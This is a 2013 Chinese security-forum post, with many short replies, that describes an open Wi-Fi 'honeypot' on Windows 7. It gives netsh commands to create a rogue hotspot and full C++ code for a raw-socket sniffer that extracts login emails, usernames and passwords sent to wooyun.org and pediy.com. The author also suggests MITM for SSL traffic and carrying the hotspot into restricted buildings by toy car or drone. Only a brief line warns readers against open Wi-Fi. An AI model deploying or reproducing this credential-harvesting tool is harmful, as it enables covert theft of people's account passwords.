首页
论坛
专栏
课程

[原创]Windows下的无线热点蜜罐

2013-9-30 23:59 9205

[原创]Windows下的无线热点蜜罐

2013-9-30 23:59
9205
Windows下的无线热点蜜罐

/**************************************
/* 作者:半斤八兩
/* 博客:http://cnblogs.com/bjblcracked
/* 日期:2013-09-30  23:59
/**************************************


只是感兴趣,没有其他目的。失误之处敬请诸位大侠赐教!

  许多公共场所我们都会看到有许多免密码的无线热点.我们大多数的人发现有免密热点,都会很高兴的感慨,  “运气真好,居然有不要密码的无线热点.” 可是否有人知道自己连上的是一个正在监视自己的眼睛?

WIFI 即Hotspot 也称无线热点,是指在公共场所提供无线局域网(WLAN)接入Internet服务的地点。这类地点多数是咖啡馆、机场、车站、商务酒店、高等院校、大型展览会馆等。这些热点有的是收费的提供无线宽带接入服务,有的则是免费的。在无线热点覆盖的地区,用户可以通过使用装有内置或外置无线网卡的笔记本电脑和PDA,来实现对Internet 的接入。

试验平台:winn7 x86 台式机
工具: 无线网卡(USB)接收器

首先们来说一下怎样搭建wifi 蜜罐.

Win7 下有一个命令可以创建个 wifi.

netsh wlan set hostednetwork ssid=pass:123456789 key=123456789



Ssid 就是上图中显示的东西.
防止别人不知道密码,我们就改成 pass:123456789
Key 我们就直接弄成 123456789

这里要注意, ssid 尽量不要弄中文的.经本人测试,发现 iphone 不支持中文 ssid.

然后我们用命令启动它.

netsh wlan start hostednetwork



这一些前提是我们要先插上 wifi 接收器.



否则我们创建虚拟 wifi 是不会成功的.

现在创建好了,我们写个抓包小程序,就可以等着 chicken 上勾就行了.
抓包我们要用混杂模式. 混杂模式可以抓到当前电脑所有网卡数据包.

#include <stdio.h>
#include <winsock2.h>
#include "DataStruct.h"
#include "InitSocket.h" 
#include <iostream>
#include "mstcpip.h"
using namespace std;
CInitSocket initSock;
int nRet = 0;
void IsWifiHoneypots(PCHAR pBuff)
{
    PIPHEADER pIphdr = (PIPHEADER)pBuff;

    pBuff += (pIphdr->ipVersion & 0xf) * sizeof(ULONG);

    PTCPHEADER pTcpHdr = (PTCPHEADER)pBuff;

    memset(szText, ' ', nRet);

    int dataLen = nRet - sizeof(IPHEADER) - sizeof(TCPHEADER);

    memcpy(szText, &pBuff[sizeof(TCPHEADER)], dataLen);

    int i = 0;
    char szEmail[MAXBYTE] = {0};
    PCHAR pEmail = szEmail;



    if(strstr(szText, "wooyun.org"))
    if(strstr(szText, "email"))
    {
        puts("--------------------------------------------");
        cout<<"found Wooyun.org password:" << endl;

        pEmail = strstr(szText, "email");

        for(i = 0; (pEmail[i] != '&'); i++);

        pEmail[i] = '\0';

        puts(pEmail);

        pEmail += i + 1;

        if(strstr(pEmail, "password"))
        {
            pEmail = strstr(pEmail, "password"); 

            for(i = 0; (pEmail[i] != '&'); i++);

            pEmail[i] = '\0';

            puts(pEmail);
        }

        puts("--------------------------------------------");
    }



    if(strstr(szText, "pediy.com"))
        if(strstr(szText, "username"))
        {
            puts("--------------------------------------------");
            cout<<"found pediy.com password:" << endl;

            pEmail = strstr(szText, "username");

            for(i = 0; (pEmail[i] != '&'); i++);

            pEmail[i] = '\0';

            puts(pEmail);

            pEmail += i + 1;

            if(strstr(pEmail, "md5password_utf="))
            {
                pEmail = strstr(pEmail, "md5password_utf=");

                for(i = 0; (pEmail[i] != 0x20); i++);

                pEmail[i] = '\0';

                puts(pEmail);
            }

            puts("--------------------------------------------");
    }
}

int main(void) 
{
    system("chcp 936 & cls & title windows wifi 蜜罐 by 半斤八兩 & color 0a");

    SOCKET sRaw = socket(AF_INET, SOCK_RAW, IPPROTO_IP);

    char szHostName[56];

    SOCKADDR_IN localAddr;

    struct hostent *pHost;
    gethostname(szHostName, 56);
    if ((pHost = gethostbyname((char*)szHostName)) == NULL)
    {
        return 0;
    }
    localAddr.sin_family = AF_INET;
    localAddr.sin_port = htons(0);
    memcpy(&localAddr.sin_addr.S_un.S_addr, pHost->h_addr_list[1], pHost->h_length);

    if (bind(sRaw, (PSOCKADDR)&localAddr, sizeof(localAddr)) == SOCKET_ERROR)
    {
        return 0;
    }

    DWORD dwValue = 1;

    if (ioctlsocket(sRaw, SIO_RCVALL, &dwValue) != 0)
    {
        return 0;
    }

    cout << "<<Listen in Wooyun.org and pediy.com>>" << endl << endl;

    char buff[1024];
    while(true)
    {
        nRet = recv(sRaw, buff, 1024, 0);
        if (nRet > 0)
        {
            buff[nRet] = '\0';
            IsWifiHoneypots(buff);
        }
    }
    closesocket(sRaw); 

    return 0;
}




为了敢在国庆前之前,代码写的有点乱.大家将就的看吧.(应该还有不少 BUG.但是 wooyun 和看雪的,应该都能抓到了.)

Wooyun 的 post 直接是明文的密码, 看雪的还是做了 md5 处理.
如果遇到了 ssl 的可以用 mitm 处理. (这里就不说了,网上有很多资料.)



通过文篇文章大家应该注意 不要随意上没有密码的 wifi..



我们设想一下,如果是一个不让进的,或者什么高级产所,我们的 wifi 信号不够广, 我们可以用一个小车子,将 wifi 热点放上去. 开启明显的 ssid. 杀进去.



如果是高楼大厦,那我们可以将 wifi 热点 装进小飞机,杀进去.~

注:本帖由看雪论坛志愿者PEstone 重新将PDF整理排版,若和原文有出入,以原作者附件为准

[推荐]看雪企服平台,提供安全分析、定制项目开发、APP等级保护、渗透测试等安全服务!

上传的附件:
上一主题 下一主题
最新回复 (95)
半斤八兩 10 2013-10-1 00:00
2
0


沙发自己坐,不能再被抢了.~  

------------------------------------------
补充一下,网卡的,我给固定死了,写的匆忙,大家需要自己选择哪个网卡
上传的附件:
tymfl 2013-10-1 00:05
3
0
下载了,来看下,原来如此
PEstone 2013-10-1 01:20
4
0
学习了!
AioliaSky 1 2013-10-1 01:22
5
0
来看看,mark了
黑涩火焰 2013-10-1 03:13
6
0
mark^-^
shenger 2013-10-1 08:56
7
0
听说过,看看
wodexinren 2013-10-1 09:03
8
0
好像很厉害
乐乐侠 2013-10-1 09:06
9
0
支持一下!!
天涯一鸿 2013-10-1 09:51
10
0
杀进去~!!!
VCKFC 2013-10-1 09:57
11
0
我觉得那个小车子,开进去,会被人偷了

能介绍一下如何做个小飞机吗?
sirofkx 2013-10-1 10:13
12
0
有意思,看看
天涯一鸿 2013-10-1 10:57
13
0
哈哈哈哈哈哈 ……太逗了……我想起那个笑话……说外国那边把IPONE绑在猫上面,把猫放出去,然后晚上回来的时候看看它一天都走了什么路程……国人看到了以后也模仿,最后IPONE不见了,猫也不见了~哈哈哈哈……
诶一 2013-10-1 10:57
14
0
最近研究的东西赶脚都有点小意思啊
Membered 2013-10-1 11:01
15
0
呵呵.... ..... ......
haohaook 2013-10-1 11:23
16
0
听说过,看看
学者learner 2013-10-1 11:40
17
0
有些人就是喜欢干这些事,,,,所以,你懂的
zzcc 2013-10-1 12:12
18
0
学习一下。。。
又迟到了 2013-10-1 12:12
19
0
必需支持!
zquchs 2013-10-1 12:27
20
0
mark!!
Protected 2013-10-1 12:39
21
0
八两妹子v5啊
alldoisbug 2013-10-1 15:08
22
0
一直默默的不敢用没有密码的wifi
yanyuyao 2 2013-10-1 18:04
23
0
下下来 看看
地狱怪客 2 2013-10-1 18:55
24
0
喜欢这个。。。。。。
hash 2013-10-1 19:16
25
0
没有明白这个虚拟wifi 是怎么当作正常wifi 用的? 通过接收端配合win7 功能就不用买真正无线路由器了吗?
半斤八兩 10 2013-10-1 19:18
26
0
是的,但前提是你的PC要能联网.
oopww 2013-10-1 21:11
27
0
QQ密码加密了的吧?呵呵!~~~难道是命令行登录?
hash 2013-10-1 21:15
28
0
搜搜明白了,代码是亮点.
游人啊k 2013-10-1 21:21
29
0
代码咋一点注释都没有,叫我们新手情以何堪
dalerkd 1 2013-10-2 08:49
30
0
只能用一个赞字!
cooop 2013-10-2 10:09
31
0
nice,楼主我爱你
qduliyang 2013-10-2 10:27
32
0
亮点在小车和飞机上~~
coocoody 2013-10-2 18:06
33
0
看看[字数不足DIY补丁]
sunnysab 2013-10-2 18:21
34
0
不错。那“飞”机能飞么?
mumaren 2013-10-2 19:06
35
0
线上志愿者是啥意思?
patriots 2013-10-2 23:11
36
0
有点意思
墨非 2013-10-2 23:52
37
0
呵呵,很有才,很有激情。话说蛋疼吗?八妹
cvcvxk 10 2013-10-3 02:29
38
0
说道小车,小飞机,其实确实有这么玩的~~~~
pigheader 2013-10-3 14:11
39
0
不错,下载下来看看
heidongqi 2013-10-3 15:52
40
0
楼主,代码差头文件呀

你把好多东西都写死了。。。

算了我直接用wireshark抓吧
iamafei 2013-10-4 11:27
41
0
小车有创意,呵呵
zzlya 2013-10-4 13:11
42
0
支持,这里面估计有大文章的。哈哈
八十客车 2013-10-4 13:25
43
0
谢谢楼主分享
huscj 2013-10-4 15:26
44
0
谢谢楼主分享
柯睡 2013-10-4 15:53
45
0
的确  这种安全问题的确需要注意
柯睡 2013-10-4 16:00
46
0
  猫也不见了............
starsli 2013-10-5 21:11
47
0
挺有意思,谢谢分享了
旧人非乐 2013-10-5 23:15
48
0
学习了 想问一下 里面那个DataStruct.h要自己写么- -
foolday 2013-10-6 00:11
49
0
mark,thx for share.
huscj 2013-10-6 09:48
50
0
感谢分享
游客
登录 | 注册 方可回帖
返回